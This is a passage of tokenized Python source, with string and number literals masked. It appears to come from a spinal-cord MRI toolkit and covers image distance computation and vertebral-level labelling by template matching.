add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = '<STR_LIT>' , <EOL> example = '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT:int>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:0> , <EOL> example = '<STR_LIT:1>' ) <EOL> return parser <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> param = Param ( ) <EOL> input_fname = None <EOL> if param . debug : <EOL> print '<STR_LIT>' <EOL> else : <EOL> param_default = Param ( ) <EOL> parser = get_parser ( ) <EOL> arguments = parser . parse ( sys . argv [ <NUM_LIT:1> : ] ) <EOL> input_fname = arguments [ "<STR_LIT>" ] <EOL> input_second_fname = '<STR_LIT>' <EOL> output_fname = '<STR_LIT>' <EOL> resample_to = <NUM_LIT:0.1> <EOL> if "<STR_LIT>" in arguments : <EOL> input_second_fname = arguments [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in arguments : <EOL> param . thinning = bool ( int ( arguments [ "<STR_LIT>" ] ) ) <EOL> if "<STR_LIT>" in arguments : <EOL> resample_to = arguments [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in arguments : <EOL> output_fname = arguments [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in arguments : <EOL> param . verbose = int ( arguments [ "<STR_LIT>" ] ) <EOL> tmp_dir = '<STR_LIT>' + time . strftime ( "<STR_LIT>" ) <EOL> sct . run ( '<STR_LIT>' + tmp_dir ) <EOL> im1_name = "<STR_LIT>" <EOL> sct . run ( '<STR_LIT>' + input_fname + '<STR_LIT:U+0020>' + tmp_dir + '<STR_LIT:/>' + im1_name ) <EOL> if input_second_fname != '<STR_LIT>' : <EOL> im2_name = '<STR_LIT>' <EOL> sct . run ( '<STR_LIT>' + input_second_fname + '<STR_LIT:U+0020>' + tmp_dir + '<STR_LIT:/>' + im2_name ) <EOL> else : <EOL> im2_name = None <EOL> os . chdir ( tmp_dir ) <EOL> input_im1 = Image ( sct_gm . 
resample_image ( im1_name , binary = True , thr = <NUM_LIT:0.5> , npx = resample_to , npy = resample_to ) ) <EOL> if im2_name is not None : <EOL> input_im2 = Image ( sct_gm . resample_image ( im2_name , binary = True , thr = <NUM_LIT:0.5> , npx = resample_to , npy = resample_to ) ) <EOL> else : <EOL> input_im2 = None <EOL> computation = ComputeDistances ( input_im1 , im2 = input_im2 , param = param ) <EOL> res_fic = open ( '<STR_LIT>' + output_fname , '<STR_LIT:w>' ) <EOL> res_fic . write ( computation . res ) <EOL> res_fic . write ( '<STR_LIT>' + input_fname ) <EOL> res_fic . write ( '<STR_LIT>' + input_second_fname ) <EOL> res_fic . close ( ) <EOL> if param . thinning : <EOL> sct . run ( '<STR_LIT>' + computation . thinning1 . thinned_image . file_name + computation . thinning1 . thinned_image . ext + '<STR_LIT>' + sct . extract_fname ( input_fname ) [ <NUM_LIT:1> ] + '<STR_LIT>' + sct . extract_fname ( input_fname ) [ <NUM_LIT:2> ] ) <EOL> if im2_name is not None : <EOL> sct . run ( '<STR_LIT>' + computation . thinning2 . thinned_image . file_name + computation . thinning2 . thinned_image . ext + '<STR_LIT>' + sct . extract_fname ( input_second_fname ) [ <NUM_LIT:1> ] + '<STR_LIT>' + sct . extract_fname ( input_second_fname ) [ <NUM_LIT:2> ] ) <EOL> os . chdir ( '<STR_LIT:..>' ) </s>
<s> import sys <EOL> from os import chdir <EOL> from glob import glob <EOL> import numpy as np <EOL> from scipy . signal import argrelextrema , gaussian <EOL> from sct_utils import extract_fname , printv , run , generate_output_file , slash_at_the_end , tmp_create <EOL> from msct_parser import Parser <EOL> from msct_image import Image <EOL> def get_parser ( ) : <EOL> parser = Parser ( __file__ ) <EOL> parser . usage . set_description ( '''<STR_LIT>''' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT:file>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = True , <EOL> example = "<STR_LIT>" ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT:file>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = True , <EOL> deprecated_by = '<STR_LIT>' , <EOL> example = "<STR_LIT>" ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT:file>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = True , <EOL> example = "<STR_LIT>" ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = [ [ '<STR_LIT:U+002C>' ] , '<STR_LIT:int>' ] , <EOL> description = '<STR_LIT>' , <EOL> mandatory = False , <EOL> example = [ '<STR_LIT>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT:int>' , <EOL> description = '<STR_LIT>' , <EOL> mandatory = False ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT:file>' , <EOL> description = '<STR_LIT>' , <EOL> mandatory = False ) <EOL> parser . add_option ( name = '<STR_LIT>' , <EOL> type_value = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> mandatory = False , <EOL> default_value = '<STR_LIT>' , <EOL> example = '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = '<STR_LIT>' ) <EOL> parser . 
add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = '<STR_LIT:0>' , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = '<STR_LIT:0>' , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = '<STR_LIT:1>' , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT>" , <EOL> description = """<STR_LIT>""" , <EOL> mandatory = False , <EOL> default_value = '<STR_LIT:1>' , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' , '<STR_LIT:2>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = None , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False ) <EOL> return parser <EOL> def calc_MI ( x , y , bins ) : <EOL> from sklearn . metrics import mutual_info_score <EOL> c_xy = np . histogram2d ( x , y , bins ) [ <NUM_LIT:0> ] <EOL> mi = mutual_info_score ( None , None , contingency = c_xy ) <EOL> return mi <EOL> def main ( args = None ) : <EOL> initz = '<STR_LIT>' <EOL> initcenter = '<STR_LIT>' <EOL> if not args : <EOL> args = sys . argv [ <NUM_LIT:1> : ] <EOL> parser = get_parser ( ) <EOL> arguments = parser . parse ( sys . 
argv [ <NUM_LIT:1> : ] ) <EOL> fname_in = arguments [ "<STR_LIT>" ] <EOL> fname_seg = arguments [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in arguments : <EOL> file_out = arguments [ "<STR_LIT>" ] <EOL> else : <EOL> file_out = '<STR_LIT>' <EOL> if '<STR_LIT>' in arguments : <EOL> path_output = arguments [ '<STR_LIT>' ] <EOL> else : <EOL> path_output = '<STR_LIT>' <EOL> if '<STR_LIT>' in arguments : <EOL> initz = arguments [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in arguments : <EOL> initcenter = arguments [ '<STR_LIT>' ] <EOL> verbose = int ( arguments [ '<STR_LIT>' ] ) <EOL> remove_tmp_files = int ( arguments [ '<STR_LIT>' ] ) <EOL> denoise = int ( arguments [ '<STR_LIT>' ] ) <EOL> laplacian = int ( arguments [ '<STR_LIT>' ] ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> path_tmp = tmp_create ( verbose = verbose ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' + fname_in + '<STR_LIT>' + path_tmp + '<STR_LIT>' ) <EOL> run ( '<STR_LIT>' + fname_seg + '<STR_LIT>' + path_tmp + '<STR_LIT>' ) <EOL> chdir ( path_tmp ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> if initz : <EOL> create_label_z ( '<STR_LIT>' , initz [ <NUM_LIT:0> ] , initz [ <NUM_LIT:1> ] ) <EOL> elif initcenter : <EOL> nii = Image ( '<STR_LIT>' ) <EOL> nii . change_orientation ( '<STR_LIT>' ) <EOL> nx , ny , nz , nt , px , py , pz , pt = nii . 
dim <EOL> z_center = int ( round ( nz / <NUM_LIT:2> ) ) <EOL> create_label_z ( '<STR_LIT>' , z_center , initcenter ) <EOL> else : <EOL> printv ( '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT:error>' ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' , verbose ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' , verbose ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' , verbose ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> init_disc = get_z_and_disc_values_from_label ( '<STR_LIT>' ) <EOL> printv ( '<STR_LIT>' + str ( init_disc ) , verbose ) <EOL> if denoise : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' , verbose ) <EOL> if laplacian : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' , verbose ) <EOL> vertebral_detection ( '<STR_LIT>' , '<STR_LIT>' , init_disc , verbose , laplacian ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' , verbose ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> clean_labeled_segmentation ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if file_out == '<STR_LIT>' : <EOL> path_seg , file_seg , ext_seg = extract_fname ( fname_seg ) <EOL> file_out = file_seg + '<STR_LIT>' + ext_seg <EOL> chdir ( '<STR_LIT:..>' ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> generate_output_file ( path_tmp + '<STR_LIT>' , path_output + file_out ) <EOL> if remove_tmp_files == <NUM_LIT:1> : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' + path_tmp ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> printv ( '<STR_LIT>' + fname_in + '<STR_LIT:U+0020>' + path_output + file_out + '<STR_LIT>' , verbose , '<STR_LIT:info>' ) <EOL> def vertebral_detection ( fname , fname_seg , init_disc , verbose , laplacian = <NUM_LIT:0> ) : <EOL> shift_AP = <NUM_LIT:32> <EOL> size_AP = <NUM_LIT:11> <EOL> size_RL = <NUM_LIT:1> <EOL> size_IS = <NUM_LIT> <EOL> smooth_factor = [ <NUM_LIT:9> , 
<NUM_LIT:3> , <NUM_LIT:1> ] <EOL> thr_corr = <NUM_LIT> <EOL> fig_anat_straight = <NUM_LIT:1> <EOL> fig_pattern = <NUM_LIT:2> <EOL> contrast_template = '<STR_LIT>' <EOL> if contrast_template == '<STR_LIT>' : <EOL> contrast_template = '<STR_LIT>' <EOL> elif contrast_template == '<STR_LIT>' : <EOL> contrast_template = '<STR_LIT>' <EOL> from os import path <EOL> path_script = path . dirname ( __file__ ) <EOL> path_sct = slash_at_the_end ( path . dirname ( path_script ) , <NUM_LIT:1> ) <EOL> folder_template = '<STR_LIT>' <EOL> fname_template_list = glob ( path_sct + folder_template + '<STR_LIT:*>' + contrast_template + '<STR_LIT>' ) <EOL> fname_template = fname_template_list [ <NUM_LIT:0> ] <EOL> fname_disc_list = glob ( path_sct + folder_template + '<STR_LIT>' ) <EOL> fname_disc = fname_disc_list [ <NUM_LIT:0> ] <EOL> data_template = Image ( fname_template ) . data <EOL> data_disc_template = Image ( fname_disc ) . data <EOL> if laplacian : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> from sct_maths import laplacian <EOL> data_template = laplacian ( data_template . astype ( float ) , [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> list_disc_value_template = sorted ( data_disc_template [ data_disc_template . nonzero ( ) ] ) <EOL> list_disc_z_template = [ int ( np . where ( data_disc_template == list_disc_value_template [ i ] ) [ <NUM_LIT:2> ] ) for i in range ( len ( list_disc_value_template ) ) ] <EOL> printv ( '<STR_LIT>' + str ( list_disc_value_template ) , verbose ) <EOL> list_distance_template = ( np . diff ( list_disc_z_template ) * ( - <NUM_LIT:1> ) ) . tolist ( ) <EOL> printv ( '<STR_LIT>' + str ( list_distance_template ) , verbose ) <EOL> if verbose == <NUM_LIT:2> : <EOL> import matplotlib . pyplot as plt <EOL> plt . ion ( ) <EOL> img = Image ( fname ) <EOL> data = img . data <EOL> from scipy . ndimage . 
filters import gaussian_filter <EOL> data = gaussian_filter ( data , smooth_factor , output = None , mode = "<STR_LIT>" ) <EOL> nx , ny , nz , nt , px , py , pz , pt = img . dim <EOL> z = range ( nz ) <EOL> xc = int ( round ( nx / <NUM_LIT:2> ) ) <EOL> yc = int ( round ( ny / <NUM_LIT:2> ) ) <EOL> if verbose == <NUM_LIT:2> : <EOL> plt . matshow ( np . mean ( data [ xc - size_RL : xc + size_RL , : , : ] , axis = <NUM_LIT:0> ) . transpose ( ) , fignum = fig_anat_straight , cmap = plt . cm . gray , origin = '<STR_LIT>' ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . autoscale ( enable = False ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> current_z = init_disc [ <NUM_LIT:0> ] <EOL> current_disc = init_disc [ <NUM_LIT:1> ] <EOL> list_disc_z = [ ] <EOL> list_disc_value = [ ] <EOL> direction = '<STR_LIT>' <EOL> search_next_disc = True <EOL> while search_next_disc : <EOL> printv ( '<STR_LIT>' + str ( current_disc ) + '<STR_LIT>' + str ( current_z ) + '<STR_LIT>' + direction , verbose ) <EOL> try : <EOL> current_z_template = int ( np . where ( data_disc_template == current_disc ) [ <NUM_LIT:2> ] ) <EOL> except TypeError : <EOL> printv ( '<STR_LIT>' , verbose , '<STR_LIT>' ) <EOL> break <EOL> pattern = data_template [ xc - size_RL : xc + size_RL + <NUM_LIT:1> , yc + shift_AP - size_AP : yc + shift_AP + size_AP + <NUM_LIT:1> , current_z_template - size_IS : current_z_template + size_IS + <NUM_LIT:1> ] <EOL> pattern1d = pattern . ravel ( ) <EOL> if verbose == <NUM_LIT:2> : <EOL> plt . figure ( fig_anat_straight ) <EOL> plt . scatter ( yc + shift_AP , current_z , c = '<STR_LIT>' , s = <NUM_LIT:50> ) <EOL> range_z = range ( - <NUM_LIT:10> , <NUM_LIT:10> ) <EOL> I_corr = np . 
zeros ( len ( range_z ) ) <EOL> allzeros = <NUM_LIT:0> <EOL> ind_I = <NUM_LIT:0> <EOL> for iz in range_z : <EOL> if current_z + iz + size_IS > nz : <EOL> padding_size = current_z + iz + size_IS <EOL> data_chunk3d = data [ xc - size_RL : xc + size_RL + <NUM_LIT:1> , yc + shift_AP - size_AP : yc + shift_AP + size_AP + <NUM_LIT:1> , current_z + iz - size_IS : current_z + iz + size_IS + <NUM_LIT:1> - padding_size ] <EOL> data_chunk3d = np . pad ( data_chunk3d , ( ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , padding_size ) ) , '<STR_LIT>' , constant_values = <NUM_LIT:0> ) <EOL> elif current_z - iz - size_IS < <NUM_LIT:0> : <EOL> padding_size = abs ( current_z - iz - size_IS ) <EOL> data_chunk3d = data [ xc - size_RL : xc + size_RL + <NUM_LIT:1> , yc + shift_AP - size_AP : yc + shift_AP + size_AP + <NUM_LIT:1> , current_z - iz - size_IS + padding_size : current_z - iz + size_IS + <NUM_LIT:1> ] <EOL> data_chunk3d = np . pad ( data_chunk3d , ( ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( padding_size , <NUM_LIT:0> ) ) , '<STR_LIT>' , constant_values = <NUM_LIT:0> ) <EOL> else : <EOL> data_chunk3d = data [ xc - size_RL : xc + size_RL + <NUM_LIT:1> , yc + shift_AP - size_AP : yc + shift_AP + size_AP + <NUM_LIT:1> , current_z + iz - size_IS : current_z + iz + size_IS + <NUM_LIT:1> ] <EOL> data_chunk1d = data_chunk3d . ravel ( ) <EOL> if ( data_chunk1d . size == pattern1d . size ) and np . any ( data_chunk1d ) : <EOL> I_corr [ ind_I ] = calc_MI ( data_chunk1d , pattern1d , <NUM_LIT:32> ) <EOL> else : <EOL> allzeros = <NUM_LIT:1> <EOL> ind_I = ind_I + <NUM_LIT:1> <EOL> if allzeros : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> I_corr_adj = I_corr <EOL> if np . 
any ( I_corr_adj ) : <EOL> ind_peak = [ i for i in range ( len ( I_corr_adj ) ) if I_corr_adj [ i ] == max ( I_corr_adj ) ] [ <NUM_LIT:0> ] <EOL> printv ( '<STR_LIT>' + str ( ind_peak ) + '<STR_LIT>' + str ( I_corr_adj [ ind_peak ] ) + '<STR_LIT:)>' , verbose ) <EOL> if I_corr_adj [ ind_peak ] < thr_corr : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> ind_peak = range_z . index ( <NUM_LIT:0> ) <EOL> else : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> ind_peak = range_z . index ( <NUM_LIT:0> ) <EOL> if verbose == <NUM_LIT:2> : <EOL> plt . figure ( fig_pattern , figsize = ( <NUM_LIT:20> , <NUM_LIT:7> ) ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> plt . imshow ( np . flipud ( np . mean ( pattern [ : , : , : ] , axis = <NUM_LIT:0> ) . transpose ( ) ) , origin = '<STR_LIT>' , cmap = plt . cm . gray , interpolation = '<STR_LIT:none>' ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> iz = <NUM_LIT:0> <EOL> data_chunk3d = data [ xc - size_RL : xc + size_RL + <NUM_LIT:1> , yc + shift_AP - size_AP : yc + shift_AP + size_AP + <NUM_LIT:1> , current_z + iz - size_IS : current_z + iz + size_IS + <NUM_LIT:1> ] <EOL> plt . imshow ( np . flipud ( np . mean ( data_chunk3d [ : , : , : ] , axis = <NUM_LIT:0> ) . transpose ( ) ) , origin = '<STR_LIT>' , cmap = plt . cm . gray , interpolation = '<STR_LIT:none>' ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> iz = range_z [ ind_peak ] <EOL> data_chunk3d = data [ xc - size_RL : xc + size_RL + <NUM_LIT:1> , yc + shift_AP - size_AP : yc + shift_AP + size_AP + <NUM_LIT:1> , current_z + iz - size_IS : current_z + iz + size_IS + <NUM_LIT:1> ] <EOL> plt . imshow ( np . flipud ( np . mean ( data_chunk3d [ : , : , : ] , axis = <NUM_LIT:0> ) . transpose ( ) ) , origin = '<STR_LIT>' , cmap = plt . cm . gray , interpolation = '<STR_LIT:none>' ) <EOL> plt . title ( '<STR_LIT>' + str ( iz ) ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> plt . plot ( I_corr_adj ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . 
plot ( ind_peak , I_corr_adj [ ind_peak ] , '<STR_LIT>' ) , plt . draw ( ) <EOL> plt . axvline ( x = range_z . index ( <NUM_LIT:0> ) , linewidth = <NUM_LIT:1> , color = '<STR_LIT>' , linestyle = '<STR_LIT>' ) <EOL> plt . axhline ( y = thr_corr , linewidth = <NUM_LIT:1> , color = '<STR_LIT:r>' , linestyle = '<STR_LIT>' ) <EOL> plt . figure ( fig_pattern ) , plt . savefig ( '<STR_LIT>' + str ( current_disc ) + '<STR_LIT>' ) , plt . close ( ) <EOL> current_z = current_z + range_z [ ind_peak ] <EOL> if verbose == <NUM_LIT:2> : <EOL> plt . figure ( fig_anat_straight ) , plt . scatter ( yc + shift_AP , current_z , c = '<STR_LIT>' , s = <NUM_LIT:50> ) <EOL> plt . text ( yc + shift_AP + <NUM_LIT:4> , current_z , str ( current_disc ) + '<STR_LIT:/>' + str ( current_disc + <NUM_LIT:1> ) , verticalalignment = '<STR_LIT>' , horizontalalignment = '<STR_LIT:left>' , color = '<STR_LIT>' , fontsize = <NUM_LIT:15> ) , plt . draw ( ) <EOL> if direction == '<STR_LIT>' : <EOL> list_disc_z . insert ( <NUM_LIT:0> , current_z ) <EOL> list_disc_value . insert ( <NUM_LIT:0> , current_disc ) <EOL> elif direction == '<STR_LIT>' : <EOL> list_disc_z . append ( current_z ) <EOL> list_disc_value . append ( current_disc ) <EOL> if len ( list_disc_z ) > <NUM_LIT:1> : <EOL> list_distance_current = ( np . diff ( list_disc_z ) * ( - <NUM_LIT:1> ) ) . tolist ( ) <EOL> index_disc_identified = [ i for i , j in enumerate ( list_disc_value_template ) if j in list_disc_value [ : - <NUM_LIT:1> ] ] <EOL> list_distance_template_identified = [ list_distance_template [ i ] for i in index_disc_identified ] <EOL> list_subject_to_template_distance = [ float ( list_distance_current [ i ] ) / list_distance_template_identified [ i ] for i in range ( len ( list_distance_current ) ) ] <EOL> correcting_factor = np . 
mean ( list_subject_to_template_distance ) <EOL> printv ( '<STR_LIT>' + str ( correcting_factor ) , verbose ) <EOL> else : <EOL> correcting_factor = <NUM_LIT:1> <EOL> list_distance = [ int ( round ( list_distance_template [ i ] * correcting_factor ) ) for i in range ( len ( list_distance_template ) ) ] <EOL> if direction == '<STR_LIT>' : <EOL> try : <EOL> approx_distance_to_next_disc = list_distance [ list_disc_value_template . index ( current_disc - <NUM_LIT:1> ) ] <EOL> except ValueError : <EOL> printv ( '<STR_LIT>' + str ( approx_distance_to_next_disc ) ) <EOL> current_z = current_z + approx_distance_to_next_disc <EOL> current_disc = current_disc - <NUM_LIT:1> <EOL> elif direction == '<STR_LIT>' : <EOL> try : <EOL> approx_distance_to_next_disc = list_distance [ list_disc_value_template . index ( current_disc ) ] <EOL> except : <EOL> printv ( '<STR_LIT>' + str ( approx_distance_to_next_disc ) ) <EOL> current_z = current_z - approx_distance_to_next_disc <EOL> current_disc = current_disc + <NUM_LIT:1> <EOL> if current_z >= nz or current_disc == <NUM_LIT:1> : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> direction = '<STR_LIT>' <EOL> current_disc = init_disc [ <NUM_LIT:1> ] + <NUM_LIT:1> <EOL> current_z = init_disc [ <NUM_LIT:0> ] - list_distance [ list_disc_value_template . index ( current_disc ) ] <EOL> if current_z <= <NUM_LIT:0> : <EOL> search_next_disc = False <EOL> upper_disc = min ( list_disc_value ) <EOL> if not upper_disc == <NUM_LIT:1> : <EOL> printv ( '<STR_LIT>' + str ( upper_disc - <NUM_LIT:1> ) , verbose ) <EOL> approx_distance_to_next_disc = list_distance [ list_disc_value_template . index ( upper_disc - <NUM_LIT:1> ) ] <EOL> next_z = max ( list_disc_z ) + approx_distance_to_next_disc <EOL> printv ( '<STR_LIT>' + str ( approx_distance_to_next_disc ) , verbose ) <EOL> if next_z > nz : <EOL> list_disc_z . insert ( <NUM_LIT:0> , nz ) <EOL> else : <EOL> list_disc_z . insert ( <NUM_LIT:0> , next_z ) <EOL> list_disc_value . 
insert ( <NUM_LIT:0> , upper_disc - <NUM_LIT:1> ) <EOL> seg = Image ( fname_seg ) <EOL> for iz in range ( nz ) : <EOL> try : <EOL> ind_above_iz = max ( [ i for i in range ( len ( list_disc_z ) ) if list_disc_z [ i ] > iz ] ) <EOL> except ValueError : <EOL> vertebral_level = <NUM_LIT:0> <EOL> else : <EOL> vertebral_level = list_disc_value [ ind_above_iz ] + <NUM_LIT:1> <EOL> ind_nonzero = np . nonzero ( seg . data [ : , : , iz ] ) <EOL> seg . data [ ind_nonzero [ <NUM_LIT:0> ] , ind_nonzero [ <NUM_LIT:1> ] , iz ] = vertebral_level <EOL> if verbose == <NUM_LIT:2> : <EOL> plt . figure ( fig_anat_straight ) <EOL> plt . scatter ( int ( round ( ny / <NUM_LIT:2> ) ) , iz , c = vertebral_level , vmin = min ( list_disc_value ) , vmax = max ( list_disc_value ) , cmap = '<STR_LIT>' , marker = '<STR_LIT:_>' , s = <NUM_LIT:200> ) <EOL> seg . file_name += '<STR_LIT>' <EOL> seg . save ( ) <EOL> if verbose == <NUM_LIT:2> : <EOL> plt . figure ( fig_anat_straight ) , plt . savefig ( '<STR_LIT>' ) <EOL> plt . close ( ) <EOL> def create_label_z ( fname_seg , z , value ) : <EOL> """<STR_LIT>""" <EOL> fname_label = '<STR_LIT>' <EOL> nii = Image ( fname_seg ) <EOL> orientation_origin = nii . change_orientation ( '<STR_LIT>' ) <EOL> nx , ny , nz , nt , px , py , pz , pt = nii . dim <EOL> from scipy . ndimage . measurements import center_of_mass <EOL> x , y = center_of_mass ( nii . data [ : , : , z ] ) <EOL> x , y = int ( round ( x ) ) , int ( round ( y ) ) <EOL> nii . data [ : , : , : ] = <NUM_LIT:0> <EOL> nii . data [ x , y , z ] = value <EOL> from sct_maths import dilate <EOL> nii . data = dilate ( nii . data , <NUM_LIT:3> ) <EOL> nii . setFileName ( fname_label ) <EOL> nii . change_orientation ( orientation_origin ) <EOL> nii . save ( ) <EOL> return fname_label <EOL> def get_z_and_disc_values_from_label ( fname_label ) : <EOL> """<STR_LIT>""" <EOL> nii = Image ( fname_label ) <EOL> from scipy . ndimage . 
measurements import center_of_mass <EOL> x_label , y_label , z_label = center_of_mass ( nii . data ) <EOL> x_label , y_label , z_label = int ( round ( x_label ) ) , int ( round ( y_label ) ) , int ( round ( z_label ) ) <EOL> value_label = int ( nii . data [ x_label , y_label , z_label ] ) <EOL> return [ z_label , value_label ] <EOL> def local_adjustment ( xc , yc , current_z , current_disc , data , size_RL , shift_AP , size_IS , searching_window_for_maximum , verbose ) : <EOL> """<STR_LIT>""" <EOL> if verbose == <NUM_LIT:2> : <EOL> import matplotlib . pyplot as plt <EOL> size_AP_mirror = <NUM_LIT:1> <EOL> searching_window = range ( - <NUM_LIT:9> , <NUM_LIT> ) <EOL> fig_local_adjustment = <NUM_LIT:4> <EOL> thr_corr = <NUM_LIT> <EOL> gaussian_std_factor = <NUM_LIT:3> <EOL> pattern = data [ xc - size_RL : xc + size_RL + <NUM_LIT:1> , yc + shift_AP - size_AP_mirror : yc + shift_AP + size_AP_mirror + <NUM_LIT:1> , current_z - size_IS : current_z + size_IS + <NUM_LIT:1> ] <EOL> if not pattern . shape == ( int ( round ( size_RL * <NUM_LIT:2> + <NUM_LIT:1> ) ) , int ( round ( size_AP_mirror * <NUM_LIT:2> + <NUM_LIT:1> ) ) , int ( round ( size_IS * <NUM_LIT:2> + <NUM_LIT:1> ) ) ) : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> return current_z <EOL> pattern1d = pattern . ravel ( ) <EOL> I_corr = np . zeros ( ( len ( searching_window ) ) ) <EOL> ind_I = <NUM_LIT:0> <EOL> for iz in searching_window : <EOL> pattern_shift = data [ xc - size_RL : xc + size_RL + <NUM_LIT:1> , yc + shift_AP - size_AP_mirror : yc + shift_AP + size_AP_mirror + <NUM_LIT:1> , current_z + iz - size_IS : current_z + iz + size_IS + <NUM_LIT:1> ] <EOL> if not pattern_shift . shape == ( int ( round ( size_RL * <NUM_LIT:2> + <NUM_LIT:1> ) ) , int ( round ( size_AP_mirror * <NUM_LIT:2> + <NUM_LIT:1> ) ) , int ( round ( size_IS * <NUM_LIT:2> + <NUM_LIT:1> ) ) ) : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> return current_z <EOL> pattern1d_shift = pattern_shift . 
ravel ( ) <EOL> pattern1d_shift_mirr = pattern1d_shift [ : : - <NUM_LIT:1> ] <EOL> I_corr [ ind_I ] = np . corrcoef ( pattern1d_shift_mirr , pattern1d ) [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> ind_I = ind_I + <NUM_LIT:1> <EOL> gaussian_window = gaussian ( len ( searching_window ) , std = len ( searching_window ) / gaussian_std_factor ) <EOL> I_corr_adj = np . multiply ( I_corr , gaussian_window ) <EOL> if verbose == <NUM_LIT:2> : <EOL> plt . figure ( fig_local_adjustment ) , plt . plot ( I_corr ) , plt . plot ( I_corr_adj , '<STR_LIT:k>' ) <EOL> plt . legend ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> ind_peak = argrelextrema ( I_corr_adj , np . greater , order = searching_window_for_maximum ) [ <NUM_LIT:0> ] <EOL> if len ( ind_peak ) == <NUM_LIT:0> : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> adjusted_z = current_z <EOL> else : <EOL> ind_peak = ind_peak [ np . argmax ( I_corr_adj [ ind_peak ] ) ] <EOL> printv ( '<STR_LIT>' + str ( ind_peak ) + '<STR_LIT>' + str ( I_corr_adj [ ind_peak ] ) + '<STR_LIT:)>' , verbose ) <EOL> if I_corr_adj [ ind_peak ] < thr_corr : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> adjusted_z = current_z <EOL> else : <EOL> adjusted_z = int ( current_z + round ( searching_window [ ind_peak ] / <NUM_LIT:2> ) ) + 